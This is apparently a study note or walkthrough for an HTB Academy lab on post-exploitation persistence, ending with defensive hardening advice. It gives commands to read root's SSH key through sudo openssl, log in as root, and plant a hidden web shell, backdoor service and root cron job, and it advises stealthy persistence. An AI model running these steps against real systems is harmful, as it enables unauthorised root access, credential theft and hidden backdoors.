🔒Post-Exploitation Persistence

🎯 Overview

Post-exploitation persistence ensures stable access after hard-fought initial compromise. Transform unstable reverse shells into persistent SSH access, escalate to root privileges, and establish reliable pivot points for internal Active Directory attacks.

🔒 Establishing Stable Access

🔑 SSH Connection Upgrade

# Leverage discovered credentials for stable access
ssh srvadm@TARGET_IP
Password: ILFreightnixadm!

# Benefits of SSH over reverse shells:
- Stable connection (no timeouts)
- Daily access restoration capability
- Efficient tunneling/pivoting setup
- Professional testing workflow
- Backup access method

📊 System Information Gathering

# Network interface analysis
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-113-generic x86_64)

System information as of [DATE]:
IPv4 address for br-65c448355ed2: 172.18.0.1    # Docker bridge
IPv4 address for docker0:         172.17.0.1    # Docker default
IPv4 address for ens160:          10.129.203.111 # External interface
IPv4 address for ens192:          172.16.8.120   # Internal AD network

# Key observations:
- DMZ positioning with dual interfaces
- Docker environment present
- Internal network connectivity confirmed
- Pivot opportunity into 172.16.8.0/23 scope

🔺 Local Privilege Escalation

🔍 Privilege Assessment

# Standard privilege escalation checks
id
# Output: uid=1003(srvadm) gid=1003(srvadm) groups=1003(srvadm)

# Sudo privileges enumeration
sudo -l

# Result:
User srvadm may run the following commands on dmz01:
    (ALL) NOPASSWD: /usr/bin/openssl

🛠️ OpenSSL GTFOBin Exploitation

# GTFOBins reference: https://gtfobins.github.io/gtfobins/openssl/
# Privileged file read capability

# Target: Root SSH private key
LFILE=/root/.ssh/id_rsa
sudo /usr/bin/openssl enc -in $LFILE

# Expected output:
-----BEGIN OPENSSH PRIVATE KEY-----
[BASE64_ENCODED_PRIVATE_KEY]
-----END OPENSSH PRIVATE KEY-----

🔐 SSH Key Persistence Setup

# 1. Save extracted private key locally
cat > dmz01_root_key << 'EOF'
-----BEGIN OPENSSH PRIVATE KEY-----
[EXTRACTED_PRIVATE_KEY_CONTENT]
-----END OPENSSH PRIVATE KEY-----
EOF

# 2. Set proper permissions
chmod 600 dmz01_root_key

# 3. Test root SSH access
ssh -i dmz01_root_key root@TARGET_IP

# 4. Verify root privileges
root@dmz01:~# id
uid=0(root) gid=0(root) groups=0(root)

🎯 Persistence Benefits Analysis

🚀 Access Advantages

# Stable SSH access provides:
- Immediate daily access restoration
- No complex exploitation chain repetition
- Reliable tunneling/pivoting capabilities
- Professional assessment efficiency
- Backup access redundancy

# Root privileges enable:
- Complete system control
- Advanced persistence mechanisms
- Network configuration access
- Internal reconnaissance capabilities
- Pivot infrastructure deployment

🔄 Alternative Persistence Methods

# SSH key deployment (if no existing keys):
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

# Backdoor web shell placement:
cp webshell.php /var/www/html/.hidden/
chown www-data:www-data /var/www/html/.hidden/webshell.php

# Service manipulation:
systemctl enable custom-backdoor.service
systemctl start custom-backdoor.service

# Scheduled task persistence:
echo "* * * * * root /tmp/.backdoor" >> /etc/crontab

🌐 Network Position Assessment

📊 DMZ Host Analysis

# Network topology understanding:
External Network (10.129.x.x) → DMZ (dmz01) → Internal Network (172.16.8.0/23)

# Host role identification:
- Web services hosting (monitoring, dev applications)
- Network boundary device
- Dual-homed system (external + internal)
- Pivot point into corporate environment

# Service enumeration:
ps aux | grep -v "]"          # Running services
netstat -antup                # Network connections
systemctl list-units --type=service  # System services

🎯 Internal Network Preparation

# Network discovery preparation:
ip route                      # Routing table analysis
arp -a                       # ARP table enumeration  
cat /etc/resolv.conf         # DNS configuration
cat /etc/hosts               # Static host entries

# Pivot planning:
- SSH tunneling capabilities
- Port forwarding setup
- SOCKS proxy configuration
- Internal reconnaissance staging

🛡️ Operational Security

🔒 Access Maintenance

# Best practices:
- Save private keys securely (encrypted storage)
- Document access credentials
- Test backup access methods
- Monitor for account changes
- Plan for credential rotation

# Risk mitigation:
- Use non-obvious persistence methods
- Avoid high-visibility modifications
- Clean up temporary files
- Document all system changes

📋 Pivot Preparation Checklist

# Pre-pivot requirements:
✅ Stable SSH access established
✅ Root privileges confirmed
✅ Network interfaces mapped
✅ Internal network connectivity verified
✅ Backup access methods deployed

# Next phase preparation:
- Internal network scanning
- Active Directory enumeration
- Domain controller identification
- Service account discovery
- Lateral movement planning

🎯 HTB Academy Lab

📋 Lab Solution Summary

# Persistence establishment chain:
1. SSH connection → srvadm:ILFreightnixadm!
2. Sudo enumeration → /usr/bin/openssl NOPASSWD
3. GTFOBin exploitation → privileged file read
4. SSH key extraction → /root/.ssh/id_rsa
5. Root access establishment → stable persistence
6. Flag retrieval → /root/flag.txt

# Key techniques demonstrated:
- Credential reuse for stable access
- GTFOBins privilege escalation
- SSH key-based persistence
- Professional access maintenance

🔍 Learning Objectives

# Technical skills:
- GTFOBins exploitation techniques
- SSH key-based persistence methods
- Privilege escalation validation
- Network position assessment

# Professional methodology:
- Stable access prioritization
- Backup access planning
- Documentation standards
- Operational security practices

# Real-world application:
- DMZ compromise scenarios
- Persistence in enterprise environments
- Internal network pivot preparation
- Long-term access maintenance

🛡️ Defensive Recommendations

🔒 System Hardening

# Sudo configuration:
- Remove unnecessary NOPASSWD entries
- Implement least privilege principles
- Regular sudo access audits
- Command logging and monitoring

# SSH security:
- Disable root SSH access
- Implement key-based authentication only
- Use SSH certificates instead of keys
- Monitor SSH access logs

# File system protection:
- Restrict access to sensitive files
- Implement file integrity monitoring
- Regular permission audits
- Secure backup storage

PreviousInitial Access NextInternal Information Gathering

Last updated 1 month ago